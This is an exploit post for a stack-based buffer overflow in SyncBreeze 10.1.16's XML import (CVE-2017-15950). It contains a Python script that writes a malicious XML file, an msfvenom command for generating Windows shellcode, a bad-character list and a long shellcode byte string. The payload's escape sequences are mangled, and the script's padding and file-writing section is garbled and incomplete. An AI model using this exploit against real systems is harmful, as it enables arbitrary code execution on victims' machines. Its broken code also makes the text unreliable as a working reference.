
SyncBreeze 10.1.16 – XML Parsing Stack-based Buffer Overflow



# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
# Date: 03/27/2021
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado  - nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950

Usage: the script writes a PoC file named xplSyncBreeze.xml. Launch the application, click Import Command, and then load that PoC file.

# -*- coding: utf-8 -*-
    
import struct

# badchars
#x00x0ax0dx20x27
#x81x82x83x84x85x86x87x88
#x89x8Ax8Bx8Cx8Dx8Ex8Fx90
#x91x92x93x94x95x96x97x98
#x99x9Ax9Bx9Cx9Dx9Ex9FxA0
#xA1xA2xA3xA4xA5xA6xA7xA8
#xA9xAAxABxACxADxAExAFxB0
#xB1xB2xB3xB4xB5xB6xB7xB8
#xB9xBAxBBxBCxBDxBExBFxC0
#xC1xC2xC3xC4xC5xC6xC7xC8
#xC9xCAxCBxCCxCDxCExCFxD0
#xD1xD2xD3xD4xD5xD6xD7xD8
#xD9xDAxDBxDCxDDxDExDFxE0
#xE1xE2xE3xE4xE5xE6xE7xE8
#xE9xEAxEBxECxEDxEExEFxF0
#xF1xF2xF3xF4xF5xF6xF7xF8
#xF9xFAxFBxFCxFDxFExFF

# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b 'x00x0Ax0Dx20x27' -v shellcode -f python

# Payload bytes as published: the msfvenom `windows/exec` output described in
# the comment above (CMD=calc, x86/alpha_mixed encoder), assembled into one
# bytes object by repeated concatenation.
# NOTE(review): the escape sequences appear to have been mangled during page
# extraction (no backslash before each "xNN"), so the literals as printed are
# plain ASCII text, not the byte values the comment's size (432 bytes) refers to.
shellcode =  b""
shellcode += b"x50x59x49x49x49x49x49x49x49x49x49"
shellcode += b"x49x49x49x49x49x49x49x37x51x5ax6a"
shellcode += b"x41x58x50x30x41x30x41x6bx41x41x51"
shellcode += b"x32x41x42x32x42x42x30x42x42x41x42"
shellcode += b"x58x50x38x41x42x75x4ax49x6bx4cx69"
shellcode += b"x78x4ex62x75x50x77x70x35x50x45x30"
shellcode += b"x4bx39x59x75x55x61x39x50x52x44x4e"
shellcode += b"x6bx42x70x50x30x6ex6bx42x72x54x4c"
shellcode += b"x6cx4bx70x52x74x54x4cx4bx62x52x66"
shellcode += b"x48x44x4fx48x37x61x5ax51x36x45x61"
shellcode += b"x39x6fx6ex4cx75x6cx43x51x71x6cx65"
shellcode += b"x52x56x4cx47x50x4bx71x38x4fx74x4d"
shellcode += b"x37x71x49x57x38x62x7ax52x52x72x36"
shellcode += b"x37x4cx4bx63x62x42x30x6cx4bx31x5a"
shellcode += b"x57x4cx4cx4bx32x6cx36x71x31x68x4a"
shellcode += b"x43x47x38x47x71x4ax71x76x31x6cx4b"
shellcode += b"x36x39x67x50x66x61x58x53x4cx4bx70"
shellcode += b"x49x66x78x59x73x34x7ax53x79x6ex6b"
shellcode += b"x50x34x4cx4bx66x61x4ex36x55x61x39"
shellcode += b"x6fx4cx6cx4ax61x4ax6fx34x4dx67x71"
shellcode += b"x48x47x67x48x69x70x71x65x59x66x54"
shellcode += b"x43x63x4dx79x68x75x6bx73x4dx67x54"
shellcode += b"x44x35x79x74x72x78x4ex6bx53x68x71"
shellcode += b"x34x57x71x5ax73x52x46x6cx4bx36x6c"
shellcode += b"x72x6bx6cx4bx76x38x75x4cx67x71x68"
shellcode += b"x53x6ex6bx57x74x4ex6bx63x31x78x50"
shellcode += b"x6fx79x73x74x47x54x64x64x53x6bx31"
shellcode += b"x4bx63x51x50x59x63x6ax43x61x39x6f"
shellcode += b"x59x70x73x6fx31x4fx62x7ax4ex6bx44"
shellcode += b"x52x6ax4bx4ex6dx53x6dx73x5ax63x31"
shellcode += b"x4cx4dx4dx55x6fx42x75x50x47x70x33"
shellcode += b"x30x46x30x50x68x74x71x6cx4bx42x4f"
shellcode += b"x6ex67x39x6fx6ex35x6fx4bx58x70x78"
shellcode += b"x35x79x32x46x36x33x58x79x36x4cx55"
shellcode += b"x4fx4dx6dx4dx39x6fx6ax75x55x6cx63"
shellcode += b"x36x61x6cx45x5ax6dx50x49x6bx39x70"
shellcode += b"x32x55x75x55x6dx6bx57x37x64x53x74"
shellcode += b"x32x52x4fx50x6ax53x30x61x43x59x6f"
shellcode += b"x78x55x73x53x30x61x30x6cx72x43x43"
shellcode += b"x30x41x41"


# padding to crash buffer
basura = struct.pack('nn".encode('utf-8'))

payload.write("nn".encode('utf-8'))

payload.close()
            




